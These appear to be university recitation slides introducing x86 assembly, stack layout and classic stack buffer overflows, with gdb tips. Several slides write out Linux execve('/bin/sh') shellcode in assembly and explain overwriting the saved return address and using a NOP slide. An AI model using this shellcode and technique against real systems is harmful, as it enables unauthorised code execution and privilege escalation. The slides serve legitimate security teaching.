Introduction to InfoSec – Recitation 2

Introduction to InfoSec – Recitation 2Nir Krakowski (nirkrako at post.tau.ac.il)Itamar Gilad (itamargi at post.tau.ac.il)

Today• More assembly tips• Review of the stack• Stack overflows• Implementation

o Tools

• Endian-ity is the definition of how numbers are represented in memory (or on a data bus)

• In the x86 architecture 0x11223344 would be represented in memory:o 44 33 22 11

• Intel Architecture is little endian. (we are using little)

• However the same number in Big Endian would be:o 11 22 33 44

• (we don’t see the bit reordering because our minimum working unit is a byte)

Little vs Big Endian

Registers• Common uses:• eax – used usually for fast calculations / system

call numbers /used to pass the return value or self class in c++.

• ecx – used as a counter frequently.• ebp – used to store the stack frame pointer• esp – used to store the stack pointer• edi/esi – used for string/buffer manipulations• ip – used to store the current instruction pointer –

can not be accessed directly!

More on register functionality

• Most registers can be (CPU-wise) variably be used for different purposes.

• However, Some register can not be used with certain commands.

• Example:o mov eip, 0xaddress ; this command is impossible.o loop some_label ;works only with ecx.

• EIP specifically can’t be manipulated directly at all. instead we use: jmp, call, retto manipulate it.

x86 stack manipulation

• The x86 stack location is noted by ESP (EBP has no direct role).

• There are two commands to manipulate the stack:o push 0ximmediate

push regpush [from memory]

o pop reg• However the stack can also be manipulated

directly, eg.:o mov [esp+10h], 4o mov [ebp-15h], 0

x86 alternative instructions

• There are lots of assembly instructions with varying sizes, and they can be used alternatively to fit certain constraints.

• Compilers use alternative ways for optimization purposes:o Some opcodes take up less space in memory.o Some code shortcuts can be made.

• Examples:o add esp,4

push eaxo Alternatively:o mov [esp-4], eax

o mov eax, 0o Alternatively:o xor eax,eax

• There are also 8 bit commands to access partial registerso mov al, 5

• There are 16 bit commandso mov ax, 65535

Buffer’Os• History:

o First documented buffer overflows were thought of in 1972 COMPUTER SECURITY TECHNOLOGY PLANNING STUDY (Page 61)

o The first buffer overflows known in the wild were Stack’Oso Stack Overflows were widely introduced by Aleph One

• Phrack Magazine Issue 49 on November 8, 1996o Title: Smashing the stack for fun and profito http://www.phrack.org/issues.html?issue=49&id=14#article

• Purpose:o Like when patching, we re-route the code to new code which adds new

functionality.o We modify the behavior of a program without modifying the binary,

and only by controlling the input!o Therefore we can subvert the original functionality of the code to any

purpose.

Where does it get really

interesting• When the program input is from a remote

connectiono Example: telnet

• When the program has higher privilegeso Example: su

Executable in Disk• This is how the program

appears on disk.• The operating system loader

loads the file and maps itinto program memory.

• Loader maps the file tomemory according toinstructions defined in theELF file.

• Loader creates new memorysection such as the ‘Stack’.

• Loader calls the start of the program

Process Memory Abstract

• /------------------\ lower• | | memory• | Text | addresses• | |• |------------------|• | (Initialized) |• | Data |• | (Uninitialized) |• |------------------|• | |• | Stack | higher• | | memory• \------------------/ addresses

Example1.c• void function(int a, int b, int c) {• char buffer1[5];• char buffer2[10];• }

• void main() {• function(1,2,3);• }

Stack Structure• bottom of top of• memory memory• buffer2 buffer1 sfp ret a b c• <------ [ ][ ][ ][ ][ ][ ][ ]• • top of bottom of• stack stack

• Our purpose is to overflow from buffer2 until we reach “ret” so that we point EIP to an arbitrary location of our choosing.

shellcode example made simple

• allocate “/bin/sh”• call execv(“/bin/sh”, NULL);• call exit(exit_code);

• We will use system calls (interrupt 0x80)• Unlike call interrupt arguments are passed via the

registers:o mov eax, 0xb ; execv system call o mov ebx, [addr to “/bin/sh” ]o mov ecx, 0 ; NULLo Int 0x80

Allocating “/bin/sh”• Not knowing where our code is located presents a

challenge, since we know its is located somewhere near EIP, but we can read EIP directly instead we use the following “trick”:

jmp endend:pop ebx ; Now ebx will hold the address to “/bin/sh”call beginning.string “/bin/sh”

shellcode example with interrupt calls

• jmp call_start # jump to the end of the code to /bin/sh• start_shellcode: # label to jump back• pop ebx # put point to /bin/sh in ebx• xor eax,eax # zero eax, but dont use mov, because it include \x00• mov al, 0xb # system call 0xb, - execve• xor ecx, ecx # clear pointer to envp• int 0x80 # call a system call!• xor eax,eax # ignore return and reset to zero.• mov al, 0x1 # call exit system call• int 0x80• call_start:• call start_shellcode• .string "/bin/sh"

Shellcode• In the exercise, shellcode will be provided for you,

there is no need to compile it, simply use it “as is”.

NOP Slide• Slides EIP to

beginning ofcode.

• Avoids fromIllegal Instruction

• Protects againststack differences

CPU/EIP

NOP Start

Shellcode Start

Stack’o Example• Demo

Tools List• gdb – GNU Debugger

o Core dump analysis: gdb –core=core.dumpo Ollydbg – (for windows) which we will not cover in the course.

• IDAo va_to_offset.py – easy program to get offset of code in orig file.

• ghex – can be used to patch the binary :o Once we have a search string to find the binary code, we can modify it

• Other common tools for linux debugging:o ltrace – library tracingo strace – system call tracingo objdump – dump elf file and symbol informationo strings – can be used to view strings inside a binary.

• shellcode

GDB Quick browse• Running gdb:

o gdb ./executableo gdb –args=“./executable [params]”o gdb –core=[core_file_name]

• r arg1 arg2 – runs the file with the specified arguments• si, ni – step instruction• s, n – step• info reg – print all registers• dump memory filename startaddress stopaddress• x/i address – disassemble at this address• p (char *) 0x234234 – print at this address as if it was a c-string.• x/bx address – print hex starting from this address• c – continue• b somefunction – sets a breakpoint

• The end